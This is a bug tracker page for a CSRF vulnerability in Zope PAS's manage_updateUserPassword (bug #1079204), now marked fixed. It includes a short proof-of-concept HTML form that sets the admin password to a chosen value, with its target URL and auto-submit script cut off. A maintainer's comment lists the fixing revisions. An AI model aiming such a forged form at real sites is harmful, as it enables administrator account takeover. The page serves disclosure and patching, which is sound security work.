userManager manage_updateUserPassword csrf
Bug #1079204 reported by
Thomas
This bug affects 1 person
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
Zope PAS |
Fix Released
|
Undecided
|
Tres Seaver |
Bug Description
Following html allows the admin passwd to be reset :
<html>
<body>
<form action="https:/
user_id : <input value="admin" name="user_id">
<br>
password: <input value="zenoss26" name="password">
<br>
confirm :<input value="zenoss26" name="confirm">
<br>
<input type="submit">
</form>
<script>
document.
</script>
</body>
</html>
Changed in zope-pas: | |
assignee: | nobody → Tres Seaver (tseaver) |
status: | New → Confirmed |
Changed in zope-pas: | |
status: | Fix Committed → Fix Released |
information type: | Private Security → Public Security |
To post a comment you must log in.
I have checked in CSRF protection for the ZODBUserManager,
ZODBRoleManager, ZODBGroupManager, and DynamicGroupsPlugin
plugins:
http:// svn.zope. org/Products. PluggableAuthSe rvice/trunk/ ?rev=128301& view=rev
http:// svn.zope. org/Products. PluggableAuthSe rvice/trunk/ ?rev=128302& view=rev
http:// svn.zope. org/Products. PluggableAuthSe rvice/trunk/ ?rev=128303& view=rev
http:// svn.zope. org/Products. PluggableAuthSe rvice/trunk/ ?rev=128304& view=rev
http:// svn.zope. org/Products. PluggableAuthSe rvice/trunk/ ?rev=128305& view=rev
I have verified that your exploit is now blocked.